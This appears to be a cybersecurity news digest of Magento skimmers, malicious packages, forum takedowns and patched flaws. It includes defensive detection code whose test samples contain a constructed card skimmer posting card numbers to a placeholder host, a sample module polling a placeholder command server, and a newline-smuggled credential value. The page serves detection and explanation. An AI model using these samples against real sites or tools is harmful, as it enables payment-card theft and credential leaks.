CyberSecurity news

FlagThis - #Various

Pierluigi Paganini@securityaffairs.com - 19d
References: Sucuri Blog, ciso2ciso.com, ...
Hackers are exploiting Google Tag Manager (GTM) to deploy credit card skimmers on Magento-based e-commerce websites. According to reports from The Hacker News, Sucuri, and CISO2CISO, malicious actors are leveraging GTM to deliver malware that targets payment data. The attack involves injecting code that looks like a standard GTM or Google Analytics snippet but carries an obfuscated skimmer payload; a separate backdoor gives the attackers persistent access to the site.

Sucuri's investigation of a customer's Magento site found that card details were being stolen by a skimmer loaded from the cms_block.content database table. The GTM-style tag carried encoded JavaScript that collected the data entered during checkout and sent it to a remote server controlled by the attackers. The case underlines the need to lock down third-party tag integrations and to monitor not only website files but also database-stored content for unexpected scripts.
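A hunt for this class of injection, written as an added example (not Sucuri's tooling, and not Magento code): it takes rows in the shape of cms_block.content, supplied here as constructed samples, and flags any script block that resembles the GTM container loader but also calls a runtime decoder or carries a long base64 literal that decodes to JavaScript touching payment fields. The block identifiers, the placeholder container ID GTM-XXXXXXX and the collector.invalid host are all made up for the demonstration.

```python
"""Hunt for skimmer payloads hiding in Google Tag Manager look-alike snippets.

Added example: not Sucuri's tooling and not Magento code. Input rows mimic
cms_block.content; all identifiers, hosts and the container ID are placeholders.
"""
import base64
import re
from dataclasses import dataclass

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# A genuine GTM container snippet only loads gtm.js; runtime decoders inside
# something that claims to be GTM are a red flag.
DECODERS = ("atob(", "eval(", "unescape(", "fromCharCode(", "Function(", "document.write(")
# A long run of base64 alphabet inside a string literal.
B64_RE = re.compile(r"['\"]([A-Za-z0-9+/]{60,}={0,2})['\"]")
# What a card skimmer needs: payment fields and a way to exfiltrate them.
SKIMMER_HINTS = ("cc_number", "cvv", "card", "expir", "fetch(", "XMLHttpRequest", "sendBeacon")


@dataclass
class Finding:
    block_id: str
    reasons: list


def decode_base64_blobs(script: str) -> list:
    """Return the text decodings of any long base64 literals in *script*."""
    decoded = []
    for blob in B64_RE.findall(script):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch.isspace() for ch in text):
            decoded.append(text)
    return decoded


def inspect_script(body: str) -> list:
    """Reasons one <script> body looks like a skimmer disguised as GTM."""
    reasons = []
    if "gtm.start" not in body and "googletagmanager.com" not in body:
        return reasons  # not a GTM look-alike; out of scope for this hunt
    for call in DECODERS:
        if call in body:
            reasons.append(f"GTM look-alike calls {call[:-1]}")
    for text in decode_base64_blobs(body):
        hits = [h for h in SKIMMER_HINTS if h in text]
        if hits:
            reasons.append("encoded blob decodes to JS touching " + ", ".join(hits))
        elif "script" in text.lower() or "http" in text.lower():
            reasons.append("encoded blob decodes to script or URL content")
    return reasons


def scan_blocks(blocks) -> list:
    """blocks: iterable of (identifier, html) pairs, e.g. rows of cms_block."""
    findings = []
    for ident, html in blocks:
        reasons = []
        for match in SCRIPT_RE.finditer(html):
            reasons.extend(inspect_script(match.group(1)))
        if reasons:
            findings.append(Finding(ident, sorted(set(reasons))))
    return findings


# In the shape of the standard GTM container snippet; GTM-XXXXXXX is a placeholder.
LEGIT_GTM = (
    "<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':"
    "new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],"
    "j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src="
    "'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);"
    "})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>"
)

# Constructed skimmer: the same wrapper, followed by a decoded-and-evaluated
# payload that reads the card number field and posts it to a placeholder host.
_PAYLOAD = (
    "var n=document.querySelector('input[name=\"cc_number\"]');"
    "if(n){fetch('https://collector.invalid/g',{method:'POST',body:n.value});}"
)
FAKE_GTM = (
    LEGIT_GTM[: -len("</script>")]
    + "eval(atob('" + base64.b64encode(_PAYLOAD.encode()).decode() + "'));</script>"
)

# Constructed sample rows in the shape of (identifier, content) from cms_block.
SAMPLE_BLOCKS = [
    ("header_gtm", "<div>" + LEGIT_GTM + "</div>"),
    ("footer_links", "<p>Links</p>" + FAKE_GTM),
]

if __name__ == "__main__":
    for finding in scan_blocks(SAMPLE_BLOCKS):
        print(finding.block_id)
        for reason in finding.reasons:
            print("  -", reason)
```

Against a live store, feed it the identifier and content columns of cms_block; the same check is worth running over any other database-stored HTML the theme injects into the head or footer, since the skimmer in this case never touched a file on disk.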

Recommended read:
References :
  • Sucuri Blog: Sucuri warns of credit card data theft from website.
  • ciso2ciso.com: Hackers Exploit Google Tag Manager
  • The Hacker News: The Hacker News reports on hackers exploiting Google Tag Manager to deploy credit card skimmers.
  • Sucuri: Sucuri warns of credit card data theft from a customer's Magento-based eCommerce website. The credit card skimmer malware is delivered by leveraging Google Tag Manager (GTM). GTM is a free tool from Google that allows website owners to manage and deploy marketing tags on their website without needing to modify the site’s code directly.
  • ciso2ciso.com: Hackers Exploit Google Tag Manager to Deploy Credit Card Skimmers on Magento Stores – Source:thehackernews.com
  • securityaffairs.com: Sucuri researchers observed threat actors leveraging Google Tag Manager (GTM) to install e-skimmer software on Magento-based e-stores.
  • Security Intelligence: Threat actors have been observed leveraging Google Tag Manager (GTM) to deliver credit card skimmer malware targeting Magento-based e-commerce websites.
  • www.scworld.com: Magento stores compromised with Google Tag Manager skimmer
  • gbhackers.com: Information on hackers exploiting Google Tag Manager to steal credit card data from e-commerce sites.
  • securityonline.info: SecurityOnline article on hackers exploiting Google Tag Manager.
  • gbhackers.com: Hackers Exploiting Google Tag Managers to Steal Credit Card from eCommerce Sites
  • securityonline.info: Hackers Exploit Google Tag Manager to Steal Credit Card Data from Magento Sites
  • Sucuri Blog: Recently, we had a client come to us concerned that their website was infected with credit card stealing malware, often referred to as MageCart. Their website was running on Magento, a popular eCommerce content management system that skilled attackers often target to steal as many credit card numbers as possible.
  • Search Engine Journal: Hackers Use Google Tag Manager to Steal Credit Card Numbers
  • www.searchenginejournal.com: Hackers Use Google Tag Manager to Steal Credit Card Numbers

@Talkback Resources - 2d
References: bsky.app, BleepingComputer, socket.dev ...
Millions of WordPress websites face potential script injection attacks due to a vulnerability in the Essential Addons for Elementor plugin, which is installed on over 2 million sites. The flaw, tracked as CVE-2025-24752 with a CVSS score of 7.1 (High), allows reflected cross-site scripting (XSS): insufficient sanitization of URL parameters in the plugin's password reset functionality lets an attacker craft a link that injects script into the page when a victim opens it.

A fake WordPress plugin has also been found injecting casino spam that damages a site's SEO. In a separate incident, researchers flagged a malicious Python library on the PyPI repository, named 'automslc', which has been downloaded more than 100,000 times since 2019. The package bypasses Deezer's API restrictions by embedding hard-coded credentials and polling an external command-and-control server for instructions, effectively turning the machines that run it into a botnet for coordinated music piracy.
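A static triage pass for the two traits described above, as an added example that is neither Socket's scanner nor code from the automslc package: it walks a module's AST and reports string constants stored under credential-like names or dict keys, and fixed http(s) URLs passed to common request functions. The sample module is constructed to mimic the pattern (a placeholder token and reserved or example host names only); nothing in it is taken from the real package.

```python
"""Static triage for hard-coded credentials and hard-coded network endpoints.

Added example: not Socket's scanner and not code from automslc. It walks a
module's AST looking for the two traits the report describes: string
constants stored under credential-like names, and fixed http(s) URLs passed
to common request functions. The sample module below is constructed.
"""
import ast
from dataclasses import dataclass

# Name fragments that usually hold secrets; "arl" is Deezer's session cookie
# name and is included for this case (it will also match unrelated names).
SECRET_NAMES = ("password", "passwd", "secret", "token", "api_key", "apikey", "arl")
# Function names that take a URL as their first argument (requests, urllib).
NETWORK_CALLS = {"get", "post", "put", "patch", "delete", "request", "urlopen"}


@dataclass
class Hit:
    kind: str
    line: int
    detail: str


def _string(node):
    """The literal value if *node* is a string constant, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None


def _looks_secret(name: str) -> bool:
    lowered = name.lower()
    return any(fragment in lowered for fragment in SECRET_NAMES)


class Triage(ast.NodeVisitor):
    def __init__(self):
        self.hits = []

    def visit_Assign(self, node):
        # NAME = "literal" where NAME smells like a credential
        value = _string(node.value)
        if value is not None:
            for target in node.targets:
                name = target.id if isinstance(target, ast.Name) else getattr(target, "attr", "")
                if _looks_secret(name):
                    self.hits.append(Hit("hardcoded-credential", node.lineno,
                                         f"{name} = <{len(value)}-char string>"))
        self.generic_visit(node)

    def visit_Dict(self, node):
        # {"password": "literal", ...} in headers, cookies or JSON bodies
        for key, value in zip(node.keys, node.values):
            key_text = _string(key) if key is not None else None
            if key_text and _looks_secret(key_text) and _string(value) is not None:
                self.hits.append(Hit("hardcoded-credential", node.lineno,
                                     f'"{key_text}": <literal>'))
        self.generic_visit(node)

    def visit_Call(self, node):
        # requests.get("https://...") and friends with a fixed URL
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
        if name in NETWORK_CALLS and node.args:
            url = _string(node.args[0])
            if url and url.startswith(("http://", "https://")):
                self.hits.append(Hit("hardcoded-endpoint", node.lineno, url))
        self.generic_visit(node)


def triage_source(source: str) -> list:
    """Parse *source* and return the hits in source order."""
    visitor = Triage()
    visitor.visit(ast.parse(source))
    return visitor.hits


# Constructed module mimicking the reported pattern; placeholder token and
# reserved/example host names only. Not taken from automslc.
SAMPLE_MODULE = '''\
import requests

DEEZER_ARL = "a1b2c3d4e5f6"  # placeholder session token
HEADERS = {"Cookie": "arl=" + DEEZER_ARL}

def fetch_tasks():
    # polls a constructed C2 host (.invalid is a reserved TLD)
    return requests.get("https://c2.invalid/tasks", headers=HEADERS).json()

def login():
    creds = {"email": "user@example.com", "password": "hunter2"}
    return requests.post("https://api.example/login", json=creds)
'''

if __name__ == "__main__":
    for hit in triage_source(SAMPLE_MODULE):
        print(f"line {hit.line}: {hit.kind}: {hit.detail}")
```

This catches literals only: URLs assembled by concatenation or f-strings, and secrets decoded at runtime, slip past it, so treat it as a first pass before running the package in a sandbox and watching its network traffic.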

Recommended read:
References :
  • bsky.app: Socket Security has discovered a malicious PyPI package that created a botnet to pirate songs from music streaming service Deezer. The package was named automslc and had been downloaded over 100,000 times since its release in 2019.
  • BleepingComputer: A malicious PyPi package named 'automslc'  has been downloaded over 100,000 times from the Python Package Index since 2019, abusing hard-coded credentials to pirate music from the Deezer streaming service.
  • Talkback Resources: Malicious PyPI Package "automslc" Enables 104K+ Unauthorized Deezer Music Downloads [app] [mal]
  • socket.dev: Malicious PyPI Package Exploits Deezer API for Coordinated Music Piracy
  • The Hacker News: Malicious PyPI Package "automslc" Enables 104K+ Unauthorized Deezer Music Downloads
  • Sucuri Blog: Injecting malware via a fake WordPress plugin has been a common tactic of attackers for some time. This clever method is often used to bypass detection as attackers exploit the fact that plugins are not part of the core files of a WordPress site, making integrity checks more difficult.
  • gbhackers.com: A critical security vulnerability in the Essential Addons for Elementor plugin, installed on over 2 million WordPress websites, has exposed sites to script injection attacks via malicious URL parameters. The flaw, tracked as CVE-2025-24752 and scoring 7.1 (High) on the CVSS scale, allowed attackers to execute reflected cross-site scripting (XSS) attacks by exploiting insufficient input sanitization in the plugin’s password reset
  • bsky.app: Microsoft has removed two popular VSCode extensions, 'Material Theme - Free' and  'Material Theme Icons - Free,' from the Visual Studio Marketplace for allegedly containing malicious code.
  • gbhackers.com: VS Code Extension with 9 Million Installs Attacks Developers with Malicious Code
  • aboutdfir.com: VSCode extensions with 9 million installs pulled over security risks
  • bsky.app: Microsoft has removed two VSCode theme extensions from the VSCode Marketplace for containing malicious code.
  • Techzine Global: Visual Studio Code extensions with 9 million downloads removed for security risks

@www.bleepingcomputer.com - 29d
Operation Talent, a large-scale international law enforcement effort, has successfully dismantled two major cybercrime forums, Cracked and Nulled. These platforms, with a combined user base exceeding 9 million, were hubs for the distribution of illegal goods, including stolen data, malware, and hacking tools. The operation, led by German authorities with the cooperation of eight countries, involved the seizure of 12 domains, 17 servers, over 50 electronic devices, and approximately €300,000 in cash and cryptocurrencies. Two individuals were arrested in Spain and are believed to be the main operators of both forums and related services.

The takedown of Cracked and Nulled, executed between January 28th and 30th, also targeted associated services like Sellix, a payment processor used by Cracked, and StarkRDP, a hosting service promoted on both platforms. Investigators estimate that the suspects generated around €1 million in criminal proceeds through these illegal activities. Europol played a key role, providing forensic and analytical support to the authorities. The collaborative effort highlights the growing threat of “cybercrime-as-a-service”, where readily available tools and infrastructure are used to launch attacks by those with varying levels of technical knowledge.

Recommended read:
References :
  • ciso2ciso.com: International Operation Dismantles Cracked and Nulled Cybercrime Hubs – Source: www.infosecurity-magazine.com
  • www.bleepingcomputer.com: Police seizes Cracked and Nulled hacking forum servers, arrests suspects
  • www.helpnetsecurity.com: Cybercrime forums Cracked and Nulled seized, operators arrested
  • www.the420.in: Global Cybercrime Forums Cracked and Nulled Shut Down in International Sting Operation
  • Techmeme: Europol and German law enforcement arrest two suspects and seize 17 servers to take down Cracked and Nulled, two of the largest hacking forums with 10M+ users
  • securityonline.info: Europol Smashing Cybercrime Hubs: Cracked & Nulled Taken Down
  • www.techmeme.com: Techmeme summarizes the news about the Europol takedown of Cracked and Nulled hacking forums, citing BleepingComputer as a source.
  • securityonline.info: Security Online summarizes the Europol operation that led to the takedown of Cracked and Nulled cybercrime forums.
  • The Hacker News: The Hacker News reports on the authorities seizing the domains of popular hacking forums as part of a major cybercrime crackdown.
  • hackread.com: Operation Talent: Two Arrested as Authorities Dismantle Cracked and Nulled
  • cyberinsider.com: This article discusses Europol and the FBI's coordinated takedown of the large cybercrime forums, Cracked and Nulled.
  • CyberInsider: In a coordinated international effort, Europol and the FBI have dismantled Cracked.io and Nulled.to, two of the world's largest cybercrime forums, seizing their domains and shutting down associated services.
  • securityaffairs.com: Operation Talent: An international law enforcement operation seized Cracked, Nulled and other cybercrime websites
  • socradar.io: Operation Talent: FBI Takes Down Cracked.io and Nulled.to in Global Cybercrime Crackdown
  • techcrunch.com: International police coalition takes down two prolific cybercrime and hacking forums
  • www.justice.gov: U.S. Department of Justice press release on the takedown of the Cracked and Nulled forums.
  • BleepingComputer: Europol and German law enforcement confirmed the arrest of two suspects and the seizure of 17 servers in Operation Talent, which took down Cracked and Nulled, two of the largest hacking forums with over 10 million users.
  • infosec.exchange: NEW: An international coalition of law enforcement agencies announced it has seized and taken down two prominent hacking forums with more than 10 million users. German police called Cracked and Nulled “the world’s two largest trading platforms for cybercrime.” Operation has also led to several arrests, searches of properties, as well as seizure of servers, electronic devices, cash, and cryptocurrency.
  • U.S. Department of Justice: See parent toot above for EUROPOL announcement. The U.S. DOJ finally has their own press release for the takedown of cybercrime forums Cracked and Nulled. It has substantially more information about each case, definitely worth a read.
  • The420.in: Global authorities have dismantled Cracked.io and Nulled.to, two major cybercrime forums with 10M+ users.
  • DataBreaches.Net: Law enforcement has been busy. As reported yesterday, Cracked and Nulled forums were seized along with services associated with them financially.

Eduard Kovacs@SecurityWeek - 23d
Spanish authorities have arrested a hacker in Alicante for allegedly conducting over 40 cyberattacks targeting critical public and private organizations, including NATO, the US Army, and various Spanish entities such as the Guardia Civil and the Ministry of Defense. The investigation began in early 2024 after a data leak was reported from a Madrid business association, revealing that the hacker was boasting about stolen information on an underground criminal forum, even defacing the victim's website.

The suspect, known online as "Natohub" among other pseudonyms, is accused of illegally accessing computer systems, disclosing secrets, damaging computers, and money laundering. Police seized multiple computers, electronic devices, and over 50 cryptocurrency accounts containing various digital assets. Although the suspect's name hasn't been released by police, local news reports identify him as an 18-year-old man.

Recommended read:
References :
  • BleepingComputer: The Spanish police have arrested a suspected hacker in Alicante for allegedly conducting 40 cyberattacks targeting critical public and private organizations, including the Guardia Civil, the Ministry of Defense, NATO, the US Army, and various universities.
  • securityaffairs.com: Spanish Police arrested an unnamed hacker who allegedly breached tens of government institutions in Spain and the US.
  • Help Net Security: Suspected NATO, UN, US Army hacker arrested in Spain
  • SecurityWeek: Spanish authorities have arrested an individual who allegedly hacked several high-profile organizations, including NATO and the US army.
  • www.scworld.com: Suspected hacker arrested for attacks on NATO, US Army
  • CyberInsider: Police Arrest Hacker Behind Attacks on U.S. and NATO Systems
  • www.policia.es (Spanish language): The Spanish National Police and the Civil Guard announced the arrest (and release) of a hacker responsible for cyberattacks against various Spanish government organizations, NATO and U.S. Army databases, and other international companies and entities. Police seized multiple computers, electronic devices, and 50 cryptocurrency accounts containing various digital assets. Although no identity was released, the victim organizations match high-profile attacks claimed by the hacker using the alias "natohub".
  • www.securityweek.com: SecurityWeek provides details on the hacker's arrest and the organizations targeted.
  • bsky.app: The Spanish police have arrested a suspected hacker in Alicante for allegedly conducting 40 cyberattacks targeting critical public and private organizations, including the Guardia Civil, the Ministry of Defense, NATO, the US Army, and various universities. https://www.bleepingcomputer.com/news/legal/spain-arrests-suspected-hacker-of-us-and-spanish-military-agencies/
  • Cybernews: An undisclosed hacker has been accused of over 40 cyberattacks on strategic organizations, including government, universities, NATO, and the US Army.
  • Techmeme: Spanish police arrest a hacker for allegedly conducting 40 cyberattacks on critical public and private organizations, seizing 50 crypto accounts, PCs, and more
  • ciso2ciso.com: Police arrest teenager suspected of hacking NATO and numerous Spanish institutions
  • gbhackers.com: Authorities Arrested Hacker Who Compromised 40+ Organizations
  • www.helpnetsecurity.com: The Spanish National Police has arrested a hacker suspected of having breached national and international agencies (including the United Nation’s International Civil Aviation Organization and NATO), Spanish universities and companies, and released stolen data on the dark web.

@www.chainalysis.com - 23d
Ransomware payments experienced a significant decline in 2024, dropping by 35% to approximately $813.55 million, according to a report by Chainalysis. This marks a notable decrease from the record $1.25 billion paid in 2023. The decline reflects a growing trend of victims refusing to pay extortion demands, despite ransomware gangs posting more victims on leak sites. The shift suggests that organizations are becoming more resilient to ransomware attacks, possibly due to enhanced data recovery strategies and the impact of increased law enforcement interventions.

The decrease in payments, concentrated in the second half of 2024, signals a potential change in the ransomware landscape. Blockchain analytics firm Chainalysis noted that the sums demanded by cyber gangs in the second half of 2024 were 53% higher than the amounts actually paid. Law enforcement actions, including the disruption of prolific ransomware gangs such as LockBit and improved international collaboration, are also contributing to the downturn, which points to a shift in the financial dynamics of ransomware operations.

Recommended read:
References :
  • techcrunch.com: Ransomware payments fell by more than one-third in 2024 as an increasing number of victims refused to negotiate with hackers.
  • Help Net Security: Ransomware payments plummet as more victims refuse to pay
  • techcrunch.com: TechCrunch covers Chainalysis' report on the decline in ransomware payments.
  • www.chainalysis.com: Chainalysis' blog post presents their full analysis of the cryptocurrency crime trends in 2024.
  • www.cybersecurity-insiders.com: Good news as ransomware pay fell by 35 percent in 2024
  • Ars OpenForum: Amount paid by victims to hackers declined by hundreds of millions of dollars.
  • Techmeme: In 2024, ransomware attackers received ~$813.55M in payments from victims, down 35% on 2023's record $1.25B, as more victims refused to pay (Chainalysis)
  • Moonshot News: Ransomware payments have changed dramatically
  • moonshot.news: Ransomware payments fell 35% in 2024 from 2023 record-breaking $1.25 billion down to $813.55 million, marking the first revenue decline since 2022, US blockchain data platform Chainalysis reports.
  • cyberscoop.com: CyberScoop reports that ransomware payments dropped 35% in 2024.
  • Blog: Field Effect reports on the decline in ransomware payments and increase in attack frequency.
  • securityboulevard.com: Law enforcement actions, better defenses, and a refusal by victims to pay helped to reduce the amount of ransoms paid in 2024 by 35%, a sharp decline from the record $1.25 billion shelled out in 2023, according to researchers with Chainalysis.
  • www.heise.de: Various measures against cybercriminals have once again shown success in 2024: Ransom payments following ransomware attacks have fallen again.
  • Security Boulevard: Security Boulevard article on ransomware payments falling 35% in 2024.
  • cyberpress.org: Cyberpress reports on ransomware payments plummeting in 2024.
  • TechInformed: TechInformed reports on ransomware payments plummeting in 2024.

Jeff Burt@DevOps.com - 25d
References: ciso2ciso.com, lobste.rs, bsky.app ...
A malicious package imitating the popular BoltDB module has been discovered in the Go ecosystem. This package contains a backdoor that enables remote code execution, posing a significant security risk to developers using the compromised module. The malicious package, a typosquat of BoltDB, was discovered by researchers at Socket, an application security company.

This attack exploits the Go Module Mirror's caching mechanism, allowing the malware to persist undetected despite manual code reviews. After the malware was cached by the Go Module Mirror, the git tag was strategically altered on GitHub to remove traces of malicious code and hide it from manual review. To mitigate software supply-chain threats, Socket advises developers to verify package integrity before installation, analyze dependencies for anomalies, and use security tools that inspect installed code at a deeper level.

Recommended read:
References :
  • ciso2ciso.com: Source: thehackernews.com – Author: . Cybersecurity researchers have called attention to a software supply chain attack targeting the Go ecosystem that involves a malicious package capable of granting the adversary remote access to infected systems.
  • lobste.rs: Go Supply Chain Attack: Malicious Package Exploits Go Module Proxy Caching for Persistence
  • The Hacker News: Malicious Go Package Exploits Module Mirror Caching for Persistent Remote Access
  • bsky.app: Socket Security has discovered a malicious Go module for the BoltDB database that contains a hidden backdoor. The module is cached in the Go Module Mirror, the first attack documented making it into the Go Module Mirror despite manual code reviews. https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence
  • ciso2ciso.com: Malicious Go Package Exploits Module Mirror Caching for Persistent Remote Access
  • fosstodon.org: Socket: Go Supply Chain Attack: Malicious Package Exploits Go Module Proxy Caching for Persistence
  • DevOps.com: Typosquat Supply Chain Attack Targets Go Developers
  • securityonline.info: Socket researchers have discovered a malicious typosquatting package in the Go ecosystem that exploits the Go Module Proxy’s
  • www.infoworld.com: Malicious package found in the Go ecosystem
  • ciso2ciso.com: Malicious package found in the Go ecosystem – Source: www.infoworld.com
  • ciso2ciso.com: Source: www.infoworld.com – Author: The malicious package, a typosquat of the popular BoltDB module, is said to be among the first known exploits of the Go Module Mirror’s indefinite module caching.
  • heise online English: Typosquatting in the Go ecosystem: Fake BoltDB package discovered A malicious package in the Go ecosystem imitates BoltDB and contains a backdoor. Attackers used the caching service to spread the malware unnoticed.
  • www.heise.de: Typosquatting in the Go ecosystem: Fake BoltDB package discovered

info@thehackernews.com (The Hacker News)@The Hacker News - 17d
Ivanti has released security updates for Connect Secure (ICS), Policy Secure (IPS), and Secure Access Client (ISAC) to address multiple vulnerabilities, three of them rated critical. Two of the critical flaws, a stack-based buffer overflow (CVE-2025-22467) and a code injection (CVE-2024-10644), allow remote code execution (RCE); the third, external control of a file name (CVE-2024-38657), allows arbitrary file writes. All three require an authenticated attacker, but each is enough to compromise the integrity of the appliance.

The specific vulnerabilities addressed include CVE-2024-38657, which allows remote authenticated attackers with admin privileges to write arbitrary files, and CVE-2025-22467, a stack-based buffer overflow that enables remote code execution. Also patched is CVE-2024-10644 which is a code injection vulnerability, and CVE-2024-47908, an operating system command injection flaw in the admin web console of Ivanti CSA. Users are urged to update to the latest versions, Ivanti Connect Secure 22.7R2.6, Ivanti Policy Secure 22.7R1.3, and Ivanti CSA 5.0.5, as soon as possible to mitigate potential exploitation. While Ivanti is not aware of active exploitation, it's imperative to apply the patches due to the history of Ivanti appliances being weaponized.

Recommended read:
References :
  • Vulnerability-Lookup: Security advisory for Ivanti Connect Secure, Policy Secure, and Secure Access Client (multiple CVEs).
  • securityonline.info: Ivanti has disclosed multiple vulnerabilities affecting its Connect Secure, Policy Secure, and Secure Access Client products, with some
  • The Hacker News: Ivanti Patches Critical Flaws in Connect Secure and Policy Secure – Update Now
  • BleepingComputer: Ivanti has released security updates for Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), and Ivanti Secure Access Client (ISAC) to address multiple vulnerabilities, including three critical severity problems.
  • securityonline.info: CVE-2025-22467 (CVSS 9.9): Ivanti Connect Secure Vulnerability Allows Remote Code Execution
  • vulnerability.circl.lu: February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs), has been published on Vulnerability-Lookup
  • research.kudelskisecurity.com: Ivanti ICS, IPS, ISAC, CSA: Multiple Vulnerabilities Disclosed and Patched
  • socradar.io: Ivanti Security Update Addresses Severe Vulnerabilities in ICS, IPS, and ISAC (CVE-2025-22467, CVE-2024-38657, CVE-2024-10644)

@www.bleepingcomputer.com - 21d
Hackers are actively exploiting vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) software to compromise systems and potentially deploy ransomware. Cybersecurity firm Field Effect has confirmed these exploits and released a report detailing the post-exploitation activity. The vulnerabilities, tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, allow attackers to create administrator accounts and drop backdoors, laying the groundwork for further malicious activities.

Field Effect identified a breach where threat actors exploited these vulnerabilities in the SimpleHelp RMM client to infiltrate a targeted network. Following initial access, attackers execute discovery commands to gather system and network data. They then establish persistence by creating new administrator accounts and deploying the Sliver malware, a post-exploitation framework gaining popularity as a Cobalt Strike alternative. Once deployed, Sliver waits for further commands, enabling attackers to compromise the domain controller and potentially distribute malicious software.

Recommended read:
References :
  • Security Risk Advisors: Threat Actors Exploit SimpleHelp RMM Vulnerabilities to Deploy Ransomware
  • The Hacker News: The Hacker News - Hackers Exploiting SimpleHelp RMM Flaws for Persistent Access and Ransomware
  • www.bleepingcomputer.com: Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks.
  • www.scworld.com: Sliver malware spread via SimpleHelp RMM exploits
  • fieldeffect.com: Threat actors exploiting #SimpleHelp RMM #vulnerabilities to deploy #ransomware
  • gbhackers.com: Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems

@ciso2ciso.com - 30d
A series of cyber incidents have been reported, highlighting the evolving nature of online threats. A phishing campaign targeting users in Poland and Germany uses PureCrypter malware to deliver multiple payloads, including Agent Tesla and Snake Keylogger, as well as a new backdoor called TorNet. The TorNet backdoor employs detection-evasion techniques that complicate endpoint-based defenses. The campaign, active since at least mid-summer 2024, appears to be the work of financially motivated threat actors.

Several further incidents have also come to light. Over 10,000 WordPress websites were found unknowingly serving macOS and Windows malware through fake Google browser update pages. This cross-platform attack delivers AMOS to Apple users and SocGholish to Windows users, and is the first time these two families have been seen delivered together through a client-side attack. Separately, an OAuth redirect flaw in an airline travel integration system exposed millions of users to account hijacking: by manipulating parameters in the login flow, an attacker could redirect the authentication response to a site they control, take over the user's account, and perform actions such as booking hotels and car rentals. These incidents underscore the importance of constant vigilance and robust security measures across all platforms.

Recommended read:
References :
  • BleepingComputer: Hackers are believed to be exploiting recently fixed SimpleHelp Remote Monitoring and Management (RMM) software vulnerabilities to gain initial access to target networks.
  • securityaffairs.com: Attackers exploit SimpleHelp RMM software flaws for initial access.
  • Help Net Security: Attackers are leveraging vulnerabilities in SimpleHelp.
  • www.bleepingcomputer.com: Hackers are exploiting flaws in SimpleHelp RMM to breach networks
  • ciso2ciso.com: TorNet Backdoor Detection: An Ongoing Phishing Email Campaign Uses PureCrypter Malware to Drop Other Payloads – Source: socprime.com
  • cside.dev: 10,000 WordPress Websites Found Delivering MacOS and Microsoft Malware
  • The Hacker News: OAuth Redirect Flaw in Airline Travel Integration Exposes Millions to Account Hijacking

Pierluigi Paganini@securityaffairs.com - 33d
Multiple vulnerabilities have been discovered in Git and its related tools, posing a risk to user credentials. These flaws stem from the improper handling of message delimiters within the Git Credential Protocol, impacting tools such as GitHub Desktop, Git Credential Manager, Git LFS, GitHub CLI, and GitHub Codespaces. This improper handling allows malicious actors to craft URLs with injected carriage return or newline characters, leading to credential leaks. Specifically, vulnerabilities like CVE-2025-23040 in GitHub Desktop allowed for 'carriage return smuggling' through crafted submodule URLs.

These vulnerabilities arise from differences between Git's strict protocol handling and the implementations in related projects. Git Credential Manager is vulnerable because its StreamReader class misinterprets line endings, while Git LFS is vulnerable because it does not check for embedded control characters, allowing carriage-return/line-feed sequences to be injected via crafted HTTP URLs. A new configuration setting, `credential.protectProtocol`, has been introduced to mitigate these vulnerabilities as a defense-in-depth measure.
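The check that the flawed implementations lacked is easiest to see on the wire format itself. The following is an added example, not code from Git, GitHub Desktop, Git Credential Manager or Git LFS: a strict serializer and parser for the line-oriented Git Credential Protocol (assumed here as `key=value` lines ending in an empty line) that refuses any key or value containing a carriage return, newline or NUL, and treats only `\n` as a line terminator when reading a helper's reply. The sample values are constructed.

```javascript
// Added example, not the Git project's code. Message format assumed:
// "key=value\n" lines terminated by an empty line.

const FORBIDDEN = /[\r\n\0]/;

// Build the request a Git client sends to a credential helper. Every key and
// value is checked for CR, LF and NUL before it is written, so a crafted URL
// component cannot smuggle an extra "key=value" line into the stream.
function serializeCredentialRequest(fields) {
  const lines = [];
  for (const [key, value] of Object.entries(fields)) {
    if (FORBIDDEN.test(key) || FORBIDDEN.test(String(value))) {
      throw new Error(`refusing to send credential request: control character in "${key}"`);
    }
    if (!/^[a-z][a-z0-9_]*$/i.test(key)) {
      throw new Error(`invalid credential attribute name "${key}"`);
    }
    lines.push(`${key}=${value}`);
  }
  return lines.join("\n") + "\n\n";
}

// Parse a helper's response. Only "\n" ends a line; a stray "\r" anywhere is
// rejected instead of being silently treated as a line break (the lenient
// behaviour a ReadLine-style reader gives, which is the defect described above).
function parseCredentialResponse(text) {
  const result = {};
  for (const line of text.split("\n")) {
    if (line === "") break; // an empty line terminates the message
    if (line.includes("\r")) {
      throw new Error("refusing to parse credential response: carriage return in line");
    }
    const eq = line.indexOf("=");
    if (eq <= 0) throw new Error(`malformed credential line: ${JSON.stringify(line)}`);
    result[line.slice(0, eq)] = line.slice(eq + 1);
  }
  return result;
}

// Pre-check a single URL component (host, path, username) before it reaches a helper.
function isSafeCredentialValue(value) {
  return !FORBIDDEN.test(value);
}

// Stand-alone demonstration with constructed values.
if (typeof require !== "undefined" && require.main === module) {
  console.log(serializeCredentialRequest({ protocol: "https", host: "github.com", path: "org/repo.git" }));
  console.log(isSafeCredentialValue("github.com\nhost=other.example")); // false: smuggled second host= line
}
```

The serializer rejects the smuggled line at the client, which is the same place `credential.protectProtocol` adds its defense; the strict parser covers the other direction, where a helper's reply is read.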

